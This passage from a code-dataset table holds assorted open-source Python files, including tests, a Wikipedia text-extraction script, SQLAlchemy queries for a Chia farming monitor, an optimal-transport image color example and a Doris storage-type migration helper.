max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
vaurien/tests/test_util.py | mozilla-libs/vaurien | 131 | 12663443 | <reponame>mozilla-libs/vaurien<gh_stars>100-1000
import unittest
from vaurien.util import chunked
class TestUtil(unittest.TestCase):
def test_chunked(self):
self.assertEqual(sum(list(chunked(7634, 2049))), 7634)
|
data_utils/extraction.py | lcylcy/GLM_copa | 212 | 12663479 | <reponame>lcylcy/GLM_copa
import nltk
import glob
import json
import os
nltk.download('punkt')
class NLTKSegmenter:
def __init(self):
pass
@staticmethod
def segment_string(article):
return nltk.tokenize.sent_tokenize(article)
wiki_path = "data/extracted"
output_path = "formatted/wiki-key.txt"
segmenter = NLTKSegmenter()
with open(output_path, "w") as output:
for dirname in glob.glob(os.path.join(wiki_path, '*'), recursive=False):
for filename in glob.glob(os.path.join(dirname, 'wiki_*'), recursive=True):
print(filename)
article_lines = []
article_open = False
with open(filename, mode='r', newline='\n') as file:
for line in file:
line = line.rstrip()
if '<doc id=' in line:
article_open = True
elif '</doc>' in line:
key_sentences, contents = [], []
key, content = None, []
for sentences in article_lines[1:]:
if len(sentences) > 1:
if key:
if len(content) > 0 or len(contents) == 0:
key_sentences.append(key)
contents.append(content)
else:
contents[-1].append(key)
key, content = None, []
key_sentences.append(sentences[0])
contents.append(sentences[1:])
elif len(sentences) > 0:
if key:
content.append(sentences[0])
else:
key = sentences[0]
if key:
if len(content) > 0 or len(contents) == 0:
key_sentences.append(key)
contents.append(content)
else:
contents[-1].append(key)
contents = [" ".join(content) for content in contents]
article = {"key": key_sentences, "content": contents}
output.write(json.dumps(article))
output.write("\n")
article_open = False
article_lines = []
else:
if article_open and line:
sentences = segmenter.segment_string(line)
article_lines.append(sentences)
|
ctc_fast/decoder/setup.py | SrikarSiddarth/stanford-ctc | 268 | 12663498 | <filename>ctc_fast/decoder/setup.py
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("bg_decoder", ["bg_decoder.pyx"]),
Extension("clm_decoder", ["clm_decoder.pyx"]),
Extension("clm_decoder2", ["clm_decoder2.pyx"])]
)
|
leo/modes/eiffel.py | ATikhonov2/leo-editor | 1,550 | 12663508 | <filename>leo/modes/eiffel.py
# Leo colorizer control file for eiffel mode.
# This file is in the public domain.
# Properties for eiffel mode.
properties = {
"lineComment": "--",
}
# Attributes dict for eiffel_main ruleset.
eiffel_main_attributes_dict = {
"default": "null",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for eiffel mode.
attributesDictDict = {
"eiffel_main": eiffel_main_attributes_dict,
}
# Keywords dict for eiffel_main ruleset.
eiffel_main_keywords_dict = {
"alias": "keyword1",
"all": "keyword1",
"and": "keyword1",
"as": "keyword1",
"check": "keyword1",
"class": "keyword1",
"creation": "keyword1",
"current": "literal2",
"debug": "keyword1",
"deferred": "keyword1",
"do": "keyword1",
"else": "keyword1",
"elseif": "keyword1",
"end": "keyword1",
"ensure": "keyword1",
"expanded": "keyword1",
"export": "keyword1",
"external": "keyword1",
"false": "literal2",
"feature": "keyword1",
"from": "keyword1",
"frozen": "keyword1",
"if": "keyword1",
"implies": "keyword1",
"indexing": "keyword1",
"infix": "keyword1",
"inherit": "keyword1",
"inspect": "keyword1",
"invariant": "keyword1",
"is": "keyword1",
"like": "keyword1",
"local": "keyword1",
"loop": "keyword1",
"not": "keyword1",
"obsolete": "keyword1",
"old": "keyword1",
"once": "keyword1",
"or": "keyword1",
"precursor": "literal2",
"prefix": "keyword1",
"redefine": "keyword1",
"rename": "keyword1",
"require": "keyword1",
"rescue": "keyword1",
"result": "literal2",
"retry": "keyword1",
"select": "keyword1",
"separate": "keyword1",
"strip": "literal2",
"then": "keyword1",
"true": "literal2",
"undefine": "keyword1",
"unique": "literal2",
"until": "keyword1",
"variant": "keyword1",
"void": "literal2",
"when": "keyword1",
"xor": "keyword1",
}
# Dictionary of keywords dictionaries for eiffel mode.
keywordsDictDict = {
"eiffel_main": eiffel_main_keywords_dict,
}
# Rules for eiffel_main ruleset.
def eiffel_rule0(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="--",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def eiffel_rule1(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def eiffel_rule2(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def eiffel_rule3(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for eiffel_main ruleset.
rulesDict1 = {
"\"": [eiffel_rule1,],
"'": [eiffel_rule2,],
"-": [eiffel_rule0,],
"0": [eiffel_rule3,],
"1": [eiffel_rule3,],
"2": [eiffel_rule3,],
"3": [eiffel_rule3,],
"4": [eiffel_rule3,],
"5": [eiffel_rule3,],
"6": [eiffel_rule3,],
"7": [eiffel_rule3,],
"8": [eiffel_rule3,],
"9": [eiffel_rule3,],
"@": [eiffel_rule3,],
"A": [eiffel_rule3,],
"B": [eiffel_rule3,],
"C": [eiffel_rule3,],
"D": [eiffel_rule3,],
"E": [eiffel_rule3,],
"F": [eiffel_rule3,],
"G": [eiffel_rule3,],
"H": [eiffel_rule3,],
"I": [eiffel_rule3,],
"J": [eiffel_rule3,],
"K": [eiffel_rule3,],
"L": [eiffel_rule3,],
"M": [eiffel_rule3,],
"N": [eiffel_rule3,],
"O": [eiffel_rule3,],
"P": [eiffel_rule3,],
"Q": [eiffel_rule3,],
"R": [eiffel_rule3,],
"S": [eiffel_rule3,],
"T": [eiffel_rule3,],
"U": [eiffel_rule3,],
"V": [eiffel_rule3,],
"W": [eiffel_rule3,],
"X": [eiffel_rule3,],
"Y": [eiffel_rule3,],
"Z": [eiffel_rule3,],
"a": [eiffel_rule3,],
"b": [eiffel_rule3,],
"c": [eiffel_rule3,],
"d": [eiffel_rule3,],
"e": [eiffel_rule3,],
"f": [eiffel_rule3,],
"g": [eiffel_rule3,],
"h": [eiffel_rule3,],
"i": [eiffel_rule3,],
"j": [eiffel_rule3,],
"k": [eiffel_rule3,],
"l": [eiffel_rule3,],
"m": [eiffel_rule3,],
"n": [eiffel_rule3,],
"o": [eiffel_rule3,],
"p": [eiffel_rule3,],
"q": [eiffel_rule3,],
"r": [eiffel_rule3,],
"s": [eiffel_rule3,],
"t": [eiffel_rule3,],
"u": [eiffel_rule3,],
"v": [eiffel_rule3,],
"w": [eiffel_rule3,],
"x": [eiffel_rule3,],
"y": [eiffel_rule3,],
"z": [eiffel_rule3,],
}
# x.rulesDictDict for eiffel mode.
rulesDictDict = {
"eiffel_main": rulesDict1,
}
# Import dict for eiffel mode.
importDict = {}
|
axcell/models/linking/proposals_filters.py | Kabongosalomon/axcell | 335 | 12663509 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from ...pipeline_logger import pipeline_logger
import pandas as pd
from enum import Enum
class FilterOutReason(Enum):
TrainDataset = "train-dataset"
DevDataset = "dev-dataset"
EmptyModelName = "empty-model-name"
ModelCompeting = "model-competing"
class ProposalsFilter:
step = "proposals_filtering"
def _filter(self, proposals):
raise NotImplementedError
def filter(self, proposals):
which, reason = self._filter(proposals)
self.log(proposals=proposals, which=which, reason=reason)
return which, reason
def __rshift__(self, other):
return CompoundFilter([self, other])
def __call__(self, proposals):
which, reason = self.filter(proposals)
return proposals[which]
def log(self, **kwargs):
pipeline_logger(f"filtering::{self.step}::filtered", **kwargs)
class CompoundFilter(ProposalsFilter):
step = "compound_filtering"
def __init__(self, filters):
self.filters = filters
def _filter(self, proposals):
agg_which = pd.Series(data=True, index=proposals.index)
agg_reason = pd.Series(data="", index=proposals.index)
for f in self.filters:
which, reason = f.filter(proposals)
agg_reason[agg_which & ~which] = reason
agg_which &= which
proposals = proposals[which]
return agg_which, agg_reason[~agg_which]
class NopFilter(ProposalsFilter):
step = "nop_filtering"
def _filter(self, proposals):
which = pd.Series(data=True, index=proposals.index)
reason = pd.Series()
return which, reason
# filter proposals for which structure prediction
# * was unable to find model type or
# * found dataset cell containing "dev" or "train"
# this filter could be applied before taxonomy linking,
# but to make error analysis easier it's applied after
class StructurePredictionFilter(ProposalsFilter):
step = "structure_filtering"
def _filter(self, proposals):
which = (proposals.struct_model_type != '') \
& ~proposals.struct_dataset.str.contains('dev') \
& ~proposals.struct_dataset.str.contains('train')
reason = pd.Series(data="", index=proposals.index)
reason[proposals.struct_dataset.str.contains('train')] = "train-dataset"
reason[proposals.struct_dataset.str.contains('dev')] = "dev-dataset"
reason[proposals.struct_model_type == ''] = "empty-model-type"
return which, reason[~which]
class ConfidenceFilter(ProposalsFilter):
step = "confidence_filtering"
def __init__(self, confidence=-1):
self.confidence = confidence
def _filter(self, proposals):
which = proposals.confidence >= self.confidence
reason = "confidence " + proposals[~which].confidence.round(2).astype(str) + f" < {self.confidence}"
return which, reason[~which]
def log(self, **kwargs):
super().log(**kwargs, confidence=self.confidence)
class BestResultFilter(ProposalsFilter):
step = "best_result_filtering"
def __init__(self, taxonomy, context="paper"):
assert context in ["paper", "table"]
self.metrics_info = taxonomy.metrics_info
self.context = context
def _filter(self, proposals):
reason = pd.Series(data="", index=proposals.index)
indices = []
if self.context == "paper":
context_column = proposals.index.to_series().str.split('/', expand=False).apply(lambda x: x[0])
else:
context_column = proposals.index.to_series().str.split('/', expand=False).apply(lambda x: x[0] + "/" + x[1])
for key_all, group in proposals[(proposals.model_type == 'model-best') & ~proposals.parsed.isna()].groupby(
by=["dataset", "metric", "task", context_column]):
dataset, metric, task, paper = key_all
key = (task, dataset, metric)
d = 0
if key in self.metrics_info:
d = self.metrics_info[key]
elif metric in self.metrics_info:
d = self.metrics_info[metric]
elif 'error' in metric.lower():
d = -1
elif 'accuracy' in metric.lower():
d = 1
if d >= 0:
index = group.parsed.idxmax()
else:
index = group.parsed.idxmin()
indices.append(index)
reason[group.index[group.index != index]] = "replaced by " + str(index)
reason[proposals.struct_model_type == 'model-competing'] = "model-competing"
which = proposals.index.to_series().isin(indices)
return which, reason[~which]
def log(self, **kwargs):
super().log(**kwargs, context=self.context)
|
tests/test_header.py | michkoll/python-evtx | 525 | 12663585 | <gh_stars>100-1000
from fixtures import *
import Evtx.Evtx as evtx
def test_file_header(system):
'''
regression test parsing some known fields in the file header.
Args:
system (bytes): the system.evtx test file contents. pytest fixture.
'''
fh = evtx.FileHeader(system, 0x0)
# collected empirically
assert fh.magic() == 'ElfFile\x00'
assert fh.major_version() == 0x3
assert fh.minor_version() == 0x1
assert fh.flags() == 0x1
assert fh.is_dirty() is True
assert fh.is_full() is False
assert fh.current_chunk_number() == 0x8
assert fh.chunk_count() == 0x9
assert fh.oldest_chunk() == 0x0
assert fh.next_record_number() == 0x34d8
assert fh.checksum() == 0x41b4b1ec
assert fh.calculate_checksum() == fh.checksum()
def test_file_header2(security):
'''
regression test parsing some known fields in the file header.
Args:
security (bytes): the security.evtx test file contents. pytest fixture.
'''
fh = evtx.FileHeader(security, 0x0)
# collected empirically
assert fh.magic() == 'ElfFile\x00'
assert fh.major_version() == 0x3
assert fh.minor_version() == 0x1
assert fh.flags() == 0x1
assert fh.is_dirty() is True
assert fh.is_full() is False
assert fh.current_chunk_number() == 0x19
assert fh.chunk_count() == 0x1a
assert fh.oldest_chunk() == 0x0
assert fh.next_record_number() == 0x8b2
assert fh.checksum() == 0x3f6e33d5
assert fh.calculate_checksum() == fh.checksum()
|
monitor/database/queries.py | philippnormann/chia-monitor | 148 | 12663594 | from datetime import datetime, timedelta
from typing import Optional, Tuple
from monitor.database.events import (BlockchainStateEvent, ConnectionsEvent, FarmingInfoEvent,
HarvesterPlotsEvent, SignagePointEvent, WalletBalanceEvent)
from sqlalchemy.orm import Session
from sqlalchemy.sql.expression import select
from sqlalchemy.sql.functions import func
def get_proofs_found(session: Session) -> Optional[int]:
result = session.execute(select(func.sum(FarmingInfoEvent.proofs)))
return result.scalars().first()
def get_harvester_count(session: Session) -> Optional[int]:
result = session.execute(
select(ConnectionsEvent.harvester_count).order_by(ConnectionsEvent.ts.desc()))
return result.scalars().first()
def get_sync_status(session: Session) -> Optional[bool]:
result = session.execute(
select(BlockchainStateEvent.synced).order_by(BlockchainStateEvent.ts.desc()))
return result.scalars().first()
def get_blockchain_state(session: Session) -> Optional[BlockchainStateEvent]:
result = session.execute(select(BlockchainStateEvent).order_by(BlockchainStateEvent.ts.desc()))
return result.scalars().first()
def get_wallet_balance(session: Session) -> Optional[WalletBalanceEvent]:
result = session.execute(select(WalletBalanceEvent).order_by(WalletBalanceEvent.ts.desc()))
return result.scalars().first()
def get_connections(session: Session) -> Optional[ConnectionsEvent]:
result = session.execute(select(ConnectionsEvent).order_by(ConnectionsEvent.ts.desc()))
return result.scalars().first()
def get_farming_start(session: Session) -> Optional[datetime]:
result = session.execute(select(func.min(FarmingInfoEvent.ts)))
return result.scalars().first()
def get_previous_signage_point(session: Session) -> Optional[str]:
result = session.execute(
select(FarmingInfoEvent.signage_point).order_by(FarmingInfoEvent.ts.desc()).distinct(
FarmingInfoEvent.signage_point).limit(2))
return result.all()[-1][0]
def get_plot_delta(session: Session, period=timedelta(hours=24)) -> Tuple[int, int]:
result = session.execute(select(func.min(HarvesterPlotsEvent.ts)))
first_ts = result.scalars().first()
if first_ts is None:
return 0, 0
initial_ts = max(first_ts, datetime.now() - period)
sub_query = select([
HarvesterPlotsEvent.plot_count, HarvesterPlotsEvent.portable_plot_count,
HarvesterPlotsEvent.plot_size, HarvesterPlotsEvent.portable_plot_size
]).where(HarvesterPlotsEvent.ts > initial_ts).order_by(HarvesterPlotsEvent.ts).group_by(
HarvesterPlotsEvent.host)
result = session.execute(
select([
func.sum(sub_query.c.plot_count),
func.sum(sub_query.c.portable_plot_count),
func.sum(sub_query.c.plot_size),
func.sum(sub_query.c.portable_plot_size)
]))
initial_plots = result.one()
if initial_plots is None:
return 0, 0
initial_og_plot_count, initial_portable_plot_count, initial_og_plot_size, initial_portable_plot_size = initial_plots
initial_plot_count = initial_og_plot_count + initial_portable_plot_count
initial_plot_size = initial_og_plot_size + initial_portable_plot_size
current_plot_count = get_plot_count(session)
if current_plot_count is None:
return 0, 0
current_plot_size = get_plot_size(session)
if current_plot_size is None:
return 0, 0
return current_plot_count - initial_plot_count, current_plot_size - initial_plot_size
def get_plot_count(session: Session) -> Optional[int]:
og_plot_count = get_og_plot_count(session)
portable_plot_count = get_portable_plot_count(session)
if og_plot_count is not None and portable_plot_count is not None:
return og_plot_count + portable_plot_count
elif og_plot_count is not None and portable_plot_count is None:
return og_plot_count
elif og_plot_count is None and portable_plot_count is not None:
return portable_plot_count
else:
return None
def get_plot_size(session: Session) -> Optional[int]:
og_plot_size = get_og_plot_size(session)
portable_plot_size = get_portable_plot_size(session)
if og_plot_size is not None and portable_plot_size is not None:
return og_plot_size + portable_plot_size
elif og_plot_size is not None and portable_plot_size is None:
return og_plot_size
elif og_plot_size is None and portable_plot_size is not None:
return portable_plot_size
else:
return None
def get_og_plot_size(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.plot_size).label("plot_size")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.plot_size)))
return result.scalars().first()
def get_og_plot_count(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.plot_count).label("plot_count")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.plot_count)))
return result.scalars().first()
def get_portable_plot_size(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.portable_plot_size).label("portable_plot_size")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.portable_plot_size)))
return result.scalars().first()
def get_portable_plot_count(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.portable_plot_count).label("portable_plot_count")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.portable_plot_count)))
return result.scalars().first()
def get_signage_points_per_minute(session: Session, interval: timedelta) -> Optional[float]:
result = session.execute(
select(func.count(
SignagePointEvent.ts)).where(SignagePointEvent.ts >= datetime.now() - interval))
num_signage_points = result.scalars().first()
if num_signage_points is None:
return None
return num_signage_points / (interval.seconds / 60)
def get_passed_filters_per_minute(session: Session, interval: timedelta) -> Optional[float]:
result = session.execute(
select(func.sum(
FarmingInfoEvent.passed_filter)).where(FarmingInfoEvent.ts >= datetime.now() - interval))
passed_filters = result.scalars().first()
if passed_filters is None:
return None
return passed_filters / (interval.seconds / 60)
def get_current_balance(session: Session) -> int:
result = session.execute(select(WalletBalanceEvent.confirmed).order_by(WalletBalanceEvent.ts.desc()))
return result.scalars().first()
def get_last_payment(session: Session) -> int:
current_balance = get_current_balance(session)
previous_balance_query = session.execute(
select(WalletBalanceEvent.confirmed).where(
WalletBalanceEvent.confirmed != current_balance).order_by(WalletBalanceEvent.ts.desc()))
last_balance = previous_balance_query.scalars().first()
return int(current_balance) - int(last_balance)
|
examples/domain-adaptation/plot_otda_color_images.py | Pseudomanifold/POT | 830 | 12663609 | # -*- coding: utf-8 -*-
"""
=============================
OT for image color adaptation
=============================
This example presents a way of transferring colors between two images
with Optimal Transport as introduced in [6]
[6] <NAME>., <NAME>., <NAME>., & <NAME>. (2014).
Regularized discrete optimal transport.
SIAM Journal on Imaging Sciences, 7(3), 1853-1882.
"""
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: MIT License
# sphinx_gallery_thumbnail_number = 2
import os
from pathlib import Path
import numpy as np
from matplotlib import pyplot as plt
import ot
rng = np.random.RandomState(42)
def im2mat(img):
"""Converts an image to matrix (one pixel per line)"""
return img.reshape((img.shape[0] * img.shape[1], img.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(img):
return np.clip(img, 0, 1)
##############################################################################
# Generate data
# -------------
# Loading images
this_file = os.path.realpath('__file__')
data_path = os.path.join(Path(this_file).parent.parent.parent, 'data')
I1 = plt.imread(os.path.join(data_path, 'ocean_day.jpg')).astype(np.float64) / 256
I2 = plt.imread(os.path.join(data_path, 'ocean_sunset.jpg')).astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
# training samples
nb = 500
idx1 = rng.randint(X1.shape[0], size=(nb,))
idx2 = rng.randint(X2.shape[0], size=(nb,))
Xs = X1[idx1, :]
Xt = X2[idx2, :]
##############################################################################
# Plot original image
# -------------------
plt.figure(1, figsize=(6.4, 3))
plt.subplot(1, 2, 1)
plt.imshow(I1)
plt.axis('off')
plt.title('Image 1')
plt.subplot(1, 2, 2)
plt.imshow(I2)
plt.axis('off')
plt.title('Image 2')
##############################################################################
# Scatter plot of colors
# ----------------------
plt.figure(2, figsize=(6.4, 3))
plt.subplot(1, 2, 1)
plt.scatter(Xs[:, 0], Xs[:, 2], c=Xs)
plt.axis([0, 1, 0, 1])
plt.xlabel('Red')
plt.ylabel('Blue')
plt.title('Image 1')
plt.subplot(1, 2, 2)
plt.scatter(Xt[:, 0], Xt[:, 2], c=Xt)
plt.axis([0, 1, 0, 1])
plt.xlabel('Red')
plt.ylabel('Blue')
plt.title('Image 2')
plt.tight_layout()
##############################################################################
# Instantiate the different transport algorithms and fit them
# -----------------------------------------------------------
# EMDTransport
ot_emd = ot.da.EMDTransport()
ot_emd.fit(Xs=Xs, Xt=Xt)
# SinkhornTransport
ot_sinkhorn = ot.da.SinkhornTransport(reg_e=1e-1)
ot_sinkhorn.fit(Xs=Xs, Xt=Xt)
# prediction between images (using out of sample prediction as in [6])
transp_Xs_emd = ot_emd.transform(Xs=X1)
transp_Xt_emd = ot_emd.inverse_transform(Xt=X2)
transp_Xs_sinkhorn = ot_sinkhorn.transform(Xs=X1)
transp_Xt_sinkhorn = ot_sinkhorn.inverse_transform(Xt=X2)
I1t = minmax(mat2im(transp_Xs_emd, I1.shape))
I2t = minmax(mat2im(transp_Xt_emd, I2.shape))
I1te = minmax(mat2im(transp_Xs_sinkhorn, I1.shape))
I2te = minmax(mat2im(transp_Xt_sinkhorn, I2.shape))
##############################################################################
# Plot new images
# ---------------
plt.figure(3, figsize=(8, 4))
plt.subplot(2, 3, 1)
plt.imshow(I1)
plt.axis('off')
plt.title('Image 1')
plt.subplot(2, 3, 2)
plt.imshow(I1t)
plt.axis('off')
plt.title('Image 1 Adapt')
plt.subplot(2, 3, 3)
plt.imshow(I1te)
plt.axis('off')
plt.title('Image 1 Adapt (reg)')
plt.subplot(2, 3, 4)
plt.imshow(I2)
plt.axis('off')
plt.title('Image 2')
plt.subplot(2, 3, 5)
plt.imshow(I2t)
plt.axis('off')
plt.title('Image 2 Adapt')
plt.subplot(2, 3, 6)
plt.imshow(I2te)
plt.axis('off')
plt.title('Image 2 Adapt (reg)')
plt.tight_layout()
plt.show()
|
janome/__init__.py | narupo/janome | 748 | 12663647 | <filename>janome/__init__.py
from janome.version import JANOME_VERSION as __version__
__all__ = [
"__version__",
]
|
PyObjCTest/test_nsenumerator.py | Khan/pyobjc-framework-Cocoa | 132 | 12663656 | from PyObjCTools.TestSupport import *
import objc
from Foundation import *
import Foundation
class TestNSEnumeratorInteraction(TestCase):
def setUp(self):
self.arrayContainer = NSArray.arrayWithArray_(range(100))
def testNoFastEnumeration(self):
self.assertNotHasAttr(Foundation, 'NSFastEnumerationState')
def testInOperator(self):
y = []
for x in self.arrayContainer.objectEnumerator():
y.append(x)
self.assertEqual(len(y), len(self.arrayContainer))
for i in range(len(y)):
self.assertEqual(y[i], self.arrayContainer[i])
if __name__ == '__main__':
main( )
|
src/offazure/azext_offazure/vendored_sdks/offazure/models/_azure_migrate_v2_enums.py | Mannan2812/azure-cli-extensions | 207 | 12663664 | <gh_stars>100-1000
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class AgentConfigurationRebootStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
REBOOTED = "rebooted"
NOT_REBOOTED = "notRebooted"
class CredentialType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Credential type of the run as account.
"""
V_MWARE_FABRIC = "VMwareFabric"
HYPER_V_FABRIC = "HyperVFabric"
LINUX_GUEST = "LinuxGuest"
WINDOWS_GUEST = "WindowsGuest"
LINUX_SERVER = "LinuxServer"
WINDOWS_SERVER = "WindowsServer"
class HighlyAvailable(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Value indicating whether the VM is highly available.
"""
UNKNOWN = "Unknown"
NO = "No"
YES = "Yes"
class HypervisorConfigurationHypervisorType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
HYPERV = "hyperv"
class MachinePropertiesMonitoringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MONITORED = "monitored"
DISCOVERED = "discovered"
class MachinePropertiesVirtualizationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
PHYSICAL = "physical"
VIRTUAL = "virtual"
HYPERVISOR = "hypervisor"
class MachineResourcesConfigurationCpuSpeedAccuracy(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ACTUAL = "actual"
ESTIMATED = "estimated"
class OperatingSystemConfigurationBitness(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
THIRTY_TWO_BIT = "32bit"
SIXTY_FOUR_BIT = "64bit"
class OperatingSystemConfigurationFamily(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
WINDOWS = "windows"
LINUX = "linux"
SOLARIS = "solaris"
AIX = "aix"
class VirtualDiskMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Disk mode property used for identifying independent disks.
"""
PERSISTENT = "persistent"
INDEPENDENT_PERSISTENT = "independent_persistent"
INDEPENDENT_NONPERSISTENT = "independent_nonpersistent"
NONPERSISTENT = "nonpersistent"
UNDOABLE = "undoable"
APPEND = "append"
class VirtualMachineConfigurationVirtualMachineType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
HYPERV = "hyperv"
LDOM = "ldom"
LPAR = "lpar"
VMWARE = "vmware"
VIRTUAL_PC = "virtualPc"
XEN = "xen"
|
tests/test_mock.py | zyfra/ebonite | 270 | 12663692 | <gh_stars>100-1000
import pytest
from tests.conftest import MockMixin
class A:
def method(self):
"""aaaa"""
def method2(self):
return 2
class B(A, MockMixin):
def method(self):
return 1
def test_mock_mixin():
b = B()
assert b.method() == 1
b.method.assert_called()
assert b.method2() == 2
b.method2.assert_called()
def test_mock_mixin__2_instances():
b1 = B()
b2 = B()
assert b1.method() == 1
b1.method.assert_called()
b2.method.assert_not_called()
def test_mock_call_context():
b1 = B()
with pytest.raises(AssertionError):
with b1.method.called_within_context():
pass
with b1.method.called_within_context():
b1.method()
with pytest.raises(AssertionError):
with b1.method.called_within_context():
b1.method()
with b1.method.called_within_context(first=False):
b1.method()
with pytest.raises(AssertionError):
with b1.method.called_within_context(first=False, times=2):
b1.method()
with b1.method.called_within_context(first=False, times=2):
b1.method()
b1.method()
|
sphinxcontrib/napoleon/_upstream.py | SimBioSysInc/napoleon | 124 | 12663700 | # -*- coding: utf-8 -*-
"""
sphinxcontrib.napoleon._upstream
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Functions to help compatibility with upstream sphinx.ext.napoleon.
:copyright: Copyright 2013-2018 by <NAME>, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
def _(message, *args):
"""
NOOP implementation of sphinx.locale.get_translation shortcut.
"""
return message
|
tools/row_to_column/convert_row_to_column.py | kaiker19/incubator-doris | 3,562 | 12663714 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ConfigParser
import json
import os
import re
import sys
import time
from urllib import urlopen
import MySQLdb
class convert_row_to_column(object):
def connect(self, host, port, http_port, username, password):
"""
Use MySQLdb to connect to PALO
"""
self.host = host
self.port = port
self.http_port = http_port
self.username = username
self.passwd = password
try:
self.db = MySQLdb.connect(host=self.host, port=self.port,
user=self.username,
passwd=self.passwd)
self.cur = self.db.cursor()
except MySQLdb.Error as e:
print ("error %s:%s" % (str(e.args[0]), e.args[1]))
def close(self):
if self.db.open:
self.cur.close()
self.db.close()
def run(self):
url_list = "http://%s:%s@%s:%s/api/_get_ddl?db=default_cluster" % (
self.username, self.passwd, self.host, self.http_port)
url = None
show_databases_sql = "show databases"
self.cur.execute(show_databases_sql)
databases = self.cur.fetchall()
for database_tuple in databases :
#for database in ["habo_db", "tieba_recommend"]:
database = database_tuple[0]
show_tables_sql = "show tables from `" + database + "`"
self.cur.execute(show_tables_sql)
for table_tuple in self.cur:
table = table_tuple[0]
url = "%s:%s&tbl=%s" % (url_list, database, table)
try:
doc = urlopen(url).read();
doc = json.loads(doc)
except Exception as err:
print "url: %s, error: %s" % (url, err)
continue
create_table_stmt = doc["TABLE"]
ddl = create_table_stmt[0].encode("utf-8")
if ddl.find("\"storage_type\" = \"ROW\"") != -1 :
table = re.search('CREATE TABLE `(.*)`', ddl).group(1)
print "alter table " + database + "." + table + " set(\"storage_type\"=\"column\");"
def main():
cf = ConfigParser.ConfigParser()
cf.read("./conf")
host = cf.get('cluster', 'fe_host')
port = int(cf.get('cluster', 'port'))
http_port = int(cf.get('cluster', 'http_port'))
user = cf.get('cluster', 'username')
passwd = cf.get('cluster', 'password')
converter = convert_row_to_column()
converter.connect(host, port, http_port, user, passwd)
converter.run();
converter.close()
if __name__ == '__main__':
main()
|
mindmeld/components/_util.py | ritvikshrivastava/mindmeld | 580 | 12663717 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015 Cisco Systems, Inc. and others. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
